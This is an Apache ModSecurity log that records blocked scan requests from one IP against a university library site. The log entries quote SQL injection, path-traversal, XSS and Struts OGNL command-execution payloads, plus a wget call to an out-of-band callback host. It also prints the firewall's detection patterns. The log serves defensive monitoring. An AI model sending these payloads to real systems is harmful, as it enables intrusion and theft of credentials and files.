[Tue Aug 29 11:48:43.415256 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlyrAwAAAAI"]
[Tue Aug 29 11:48:43.427779 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAltVYUAAAAR"]
[Tue Aug 29 11:48:47.477306 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAlOZJgAAAAu"]
[Tue Aug 29 11:48:49.371488 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAfWN8gAAAAL"]
[Tue Aug 29 11:48:49.422278 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkoTlYAAAAH"]
[Tue Aug 29 11:48:49.443611 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkqHtsAAAAM"]
[Tue Aug 29 11:48:50.403582 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAksktcAAAAN"]
[Tue Aug 29 11:48:51.399652 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAku@mIAAAAQ"]
[Tue Aug 29 11:48:52.400314 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlV8CQAAAA1"]
[Tue Aug 29 11:48:53.379867 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAkqHuAAAAAM"]
[Tue Aug 29 11:48:54.395708 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAluT18AAAAe"]
[Tue Aug 29 11:48:55.402740 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlM8kIAAAAs"]
[Tue Aug 29 11:48:55.492464 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAjtdCoAAAAX"]
[Tue Aug 29 11:48:56.365660 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkksPwAAAAA"]
[Tue Aug 29 11:48:57.424590 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlL7DYAAAAq"]
[Tue Aug 29 11:48:57.441635 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAk1w8sAAAAY"]
[Tue Aug 29 11:48:57.467838 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkyyAEAAAAW"]
[Tue Aug 29 11:48:58.380514 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAkqHugAAAAM"]
[Tue Aug 29 11:49:02.367668 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gma53thwn9wopf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlPmvUAAAAv"]
[Tue Aug 29 11:49:04.471623 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAk1w9cAAAAY"]
[Tue Aug 29 11:49:05.413623 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlV8DkAAAA1"]
[Tue Aug 29 11:49:08.397303 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAjy57kAAAAG"]
[Tue Aug 29 11:49:09.404221 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmG@rkAAAAy"]
[Tue Aug 29 11:49:09.501658 2023] [:error] [pid 2451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAmT6y4AAAAm"]
[Tue Aug 29 11:49:15.372307 2023] [:error] [pid 2447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAmPEk0AAAAV"]
[Tue Aug 29 11:51:05.260564 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAlIBdsAAAAn"]
[Tue Aug 29 11:51:05.418511 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAknELsAAAAB"]
[Tue Aug 29 11:51:05.435467 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15OcCo-f0AAAhoHOIAAAAl"]
[Tue Aug 29 11:51:05.630680 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOBkAAAAL"]
[Tue Aug 29 11:51:05.671190 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBsAAAAL"]
[Tue Aug 29 11:51:06.086984 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAhoHOkAAAAl"]
